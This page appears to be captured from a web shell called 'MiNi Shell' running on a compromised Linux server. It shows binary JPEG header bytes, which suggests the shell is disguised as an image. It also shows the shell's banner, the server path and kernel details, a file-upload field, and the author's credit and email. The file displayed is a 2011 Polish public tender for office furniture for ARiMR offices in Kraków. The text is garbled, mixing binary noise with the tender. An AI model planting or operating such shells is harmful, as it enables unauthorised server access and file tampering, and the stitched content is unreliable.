JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111122/390384-N-2011.html

<p class="kh_header"><b>Kraków: Dostawa mebli biurowych i regałów dla Małopolskiego Oddziału Regionalnego ARiMR oraz Biur Powiatowych ARiMR w województwie małopolskim.</b><br>
<b>Numer ogłoszenia: 390384 - 2011; data zamieszczenia: 22.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa , ul. Lubicz 25, 31-503 Kraków, woj. małopolskie, tel. 012 6298010, faks 012 4211311.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli biurowych i regałów dla Małopolskiego Oddziału Regionalnego ARiMR oraz Biur Powiatowych ARiMR w województwie małopolskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, rozładunek wraz montażem do siedziby Małopolskiego Oddziału Regionalnego ARiMR oraz  Biur Powiatowych ARiMR w województwie małopolskim mebli biurowych oraz regałów archiwizacyjnych, spełniających wymagania Zamawiającego określone w opisie technicznym, w poniżej przedstawionych ilościach i asortymencie,w podziale na następujące zadania:

Zadanie I: Dostawa mebli biurowych dla Małopolskiego Oddziału Regionalnego Agencji Restrukturyzacji i Modernizacji Rolnictwa i Biur Powiatowych Agencji Restrukturyzacji i Modernizacji Rolnictwa (meble dostarczone pod wymienione niżej adresy i zmontowane, przygotowane do natychmiastowego użytkowania):
Meble będące przedmiotem zamówienia muszą odpowiadać kształtem, kolorystyką, parametrom technicznym oraz gabarytom, meblom znajdującym się aktualnie na wyposażeniu pomieszczeń biurowych Małopolskiego Oddziału Regionalnego ARiMR i Biur Powiatowych ARiMR w woj. małopolskim. 

W tym celu Wykonawcom przysługuje prawo do przeprowadzenia wizji lokalnej.

Opis techniczny mebli i ilości całkowite:


1.	 Kontener biurowy -  28 sztuk 

Kontener o wymiarach (wys/szer/gł) 55x43x60	 cm z trzema szufladami głębokimi oraz czwartą typu piórnik. Kontener wykonany z płyty wiórowej o grubości min 18 mm. Tylna ścianka kontenera jest wykonana z płyty o grubości min. 10mm. Płyta  pokryta melaminą grubości min. 0,2mm w kolorze jasnego buku, krawędzie zabezpieczone doklejką PCV grubości min. 1,2 mm. Fronty szuflad wyposażone w metalową rączkę w kolorze stelaża biurka. Metalowe szuflady na prowadnicach gwarantujących, co najmniej 75% wysów, zaopatrzone w blokadę oraz zamek posiadający indywidualny numer, fronty szuflad wykończone identycznie jak blat kontenera. Kontener jest wyposażony w wysokiej jakości kółka jezdne w tym dwa przednie z blokadą.

       2.Szafa aktowa -  22 sztuk 
Szafa o wymiarach (szer/gł/wys) 80 x 44 x 205 cm jest wykonana z płyty wiórowej o grubości min. 18 mm, a plecy szafy wykonane z płyty o grubości min. 10mm. Półki wykonane z płyty o grubości min. 22 mm. Płyta jest pokryta melaminą grubości min. 0,2 mm w kolorze jasnego buku. Wszystkie krawędzie płyty są zabezpieczone doklejką PCV grubości min. 1,2mm. Szafa ma posiadać cokół wysokości 12 cm. Szafa wyposażona w cztery regulowane półki z systemem zapobiegającym ich przypadkowemu wysunięciu. Zawiasy szafy samo zatrzaskowe. Drzwi szafy wyposażone w 3 zawiasy i ryglowanie w dwóch punktach - na dole i na górze szafy. Szafa zamykana na zamek patentowy (każdy posiada numer). Szafa ma posiadać możliwość wyregulowania jej wysokości w zakresie min. 4 cm. Szafa posiada stopki o średnicy min. 4 cm wykonane z plastiku.


3.	Szafa aktowo-ubraniowa - 4 sztuki
Szafa o wymiarach  (szer/gł/wys) 80 x 44 x 205 cm jest wykonana z płyty wiórowej o grubości 18mm, a plecy szafy wykonane z płyty o grubości 10mm. Półki są wykonane z płyty o grubości 22mm. Płyta jest pokryta melaminą grubości  0.2mm w kolorze blatu biurka. Wszystkie krawędzie płyty wiórowej są zabezpieczone doklejką PCV grubości 1.2mm. Szafa jest wyposażona w cztery regulowane półki z systemem zapobiegającym ich przypadkowemu wysunięciu. Szafa posiada cokół wysokości  12 cm. Zawiasy szafy samo zatrzaskowe. Drzwi szafy są wyposażone w 3 zawiasy i ryglowanie w dwóch punktach - na dole i na górze szafy. Szafa zamykana na zamek. Szafa posiada możliwość wyregulowania jej wysokości w zakresie 4 cm. Szafa posiada stopki o średnicy  4 cm wykonane z plastiku. Szafa podzielona na część ubraniową i oddzieloną część z półkami na dokumenty.

4.	Szafa aktowa niska - 20 sztuk
Szafka aktowa niska o wymiarach  (szer/gł/wys) 80x50x90 cm. Szafka aktowa wykonana z płyty o grubości 18 mm z tym, że plecy szafki powinny być wykonane z płyty o gr. min 10 mm a półki z płyty o grubości 22 mm. Płyta powinna zostać pokryta melaminą gr. min 0,2 mm w kolorze blatu biurka. Wszystkie krawędzie płyty powinny być zabezpieczone doklejką PCV grubości min. 1.2 mm . Szafka jest wyposażona w jedną regulowaną półkę z systemem zapobiegającym jej przypadkowemu wysunięciu. Szafa posiada cokół wysokości 12 cm. Drzwi szafki wyposażone są w minimum 2 zawiasy samozatrzaskowe, szafka jest ryglowana w  minimum 2 punktach - na dole i na górze szafki. Szafka zamykana na zamek. Szafka powinna posiadać mechanizm do regulacji wysokości w zakresie min 4 cm. Szafka powinna posiadać stopki o średnicy minimum 4 cm wykonane z plastiku w celu zabezpieczenia podłoża, na którym będzie stała.
5.	Szafka pod drukarkę - 7 sztuk
Szafa aktowa niska o wymiarach (szer/głęb/wys) 80x50x53 cm. Szafa aktowa wykonana jest z płyty o grubości 18 mm z tym, że plecy szafy powinny być wykonane z płyty o gr. min 10 mm. Płyta powinna zostać pokryta melaminą gr. min 0,2 mm w kolorze blatu biurka. Wszystkie krawędzie płyty powinny być zabezpieczone doklejką PCV grubości min. 1.2 mm . Szafka nie posiada wewnętrznych półek. Cokół szafki - o wysokości 12 cm. Drzwi szafki wyposażone w minimum 2 zawiasy samozatrzaskowe, szafka jest ryglowana w  minimum 2 punktach - na dole i na górze szafki. Szafka zamykana na zamek. Szafa powinna posiadać stopki o średnicy minimum 4 cm wykonane z plastiku w celu zabezpieczenia podłoża, na którym będzie stała.
      6.Fotele pracownicze -  70 sztuk
Fotel pracowniczy obrotowy (wytrzymujący nacisk dorosłej osoby siedzącej ważącej min. 120 kg), amortyzator - siłownik zapewniający płynną regulacje siedziska, siedzisko 45 - 50 cm długości, oparcie fotela z regulacją wysokości i kąta nachylenia, regulacja głębokości siedziska, fotel zaopatrzony w podłokietniki regulowane. Kolor tapicerki zielony - obowiązujący w ARiMR, wytrzymałość tapicerki wynosi 50 000 cykli w skali Martindalea. Fotel posadowiony na pięcioramiennej podstawie z kółkami jezdnymi dostosowanymi do wykładzin dywanowych.

Dostawa do Biur Powiatowych wg. wykazu zawartego w SIWZ
 Zadanie II - dostawa regałów archiwizacyjnych - 70 sztuk  dla Małopolskiego Oddziału Regionalnego Agencji Restrukturyzacji i Modernizacji Rolnictwa i Biur Powiatowych Agencji Restrukturyzacji i Modernizacji Rolnictwa o wskazanej poniżej charakterystyce i pod adresy wskazane w SIWZ:

1.	Zabezpieczone antykorozyjnie-malowanie proszkowe w kolorze jasnopopielatym.
2.	Elementy skręcane śrubami lub w inny sposób zapewniający nośność i stabilność.
3.	Zapewnienie możliwości wypoziomowania regału (poprzez stosowny system lub podkładki).
4.	Wymiary regałów:
-wysokość 2000 mm (dopuszcza się odstępstwo +/- 50 mm),
-szerokość 900 mm (dopuszcza się odstępstwo +/- 50 mm),
-głębokość 400 mm (maksymalnie 450 mm),
-nośność półek minimum 90 kg
-odległość dolnej półki od podłogi ok. 200 mm,
-górne zakończenie regału winno być wykonane z blachy lub zakończone półką.
5. Ilość użytkowych półek-5 szt. do każdego regału (nie licząc górnego zakończenia).
6. Dodatkowe listwy boczne i tylne zabezpieczające przed wypadnięciem dokumentów oraz zwiększające stabilność.
7.Możliwość skręcania regałów plecami, względnie przykręcania do ściany.
8. Dodatkowe wzmocnienie krzyżowe (stężenia) zapewniające sztywność regału (zwłaszcza zapełnionego aktami). 


Regały nieskręcone (wyposażone we wszystkie elementy i podzespoły niezbędne do ich późniejszego montażu, w szczególności takie jak śruby, podkładki, itp., spakowane na zasadzie: jedno opakowanie - jeden kompletny regał).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.13.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
- działania siły wyższej lub wystąpienia stanu wyższej konieczności
-wystąpienia warunków atmosferycznych całkowicie uniemożliwiających wykonanie przedmiotu zamówienia w wyznaczonych terminach
- zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe
- zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia
- omyłek pisarskich lub błędów rachunkowych,
-  mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
-  jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego
- innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25, 31-503 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2011 godzina 11:00, miejsce: Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25, 31-503 Kraków, Dziennik Podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com